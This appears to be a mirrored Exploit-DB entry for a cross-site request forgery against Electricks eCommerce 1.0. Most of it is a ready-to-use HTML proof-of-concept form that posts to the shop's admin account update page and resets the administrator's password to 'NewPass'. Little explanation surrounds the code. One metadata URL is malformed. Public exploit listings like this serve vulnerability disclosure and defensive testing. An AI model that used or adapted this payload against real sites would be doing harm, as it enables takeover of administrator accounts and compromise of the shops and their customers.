[] NeoSense
E X P L O I T S
title author type platform port cve id

Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)

Author: Nawaf Alkeraithe
type: webapps
platform: php
port: 80.0
date_added: 2018-11-14 
date_updated: 2018-11-14 
verified: 0 
codes:  
tags: Cross-Site Request Forgery (CSRF)
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comelectricks.zip
# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2018-11-12
# Exploit Author: Nawaf Alkeraithe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
# Version: 1.0

#PoC:

<html><form enctype="application/x-www-form-urlencoded" method="POST"
action="
http://localhost/Electricks/Electricks/Electricks-shop/pages/admin_account_update.php"><table><tr><td>user_id</td><td><input
type="text" value="4" name="user_id"></td></tr>
<tr><td>firstname</td><td><input type="text" value="admin"
name="firstname"></td></tr>
<tr><td>lastname</td><td><input type="text" value="admin"
name="lastname"></td></tr>
<tr><td>email</td><td><input type="text" value="admin@admin.com"
name="email"></td></tr>
<tr><td>username</td><td><input type="text" value="admin"
name="username"></td></tr>
<tr><td>password</td><td><input type="text" value="NewPass"
name="password"></td></tr>
<tr><td>update</td><td><input type="text" value="" name="update"></td></tr>
</table><input type="submit" value="Change Admin Password"></form></html>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.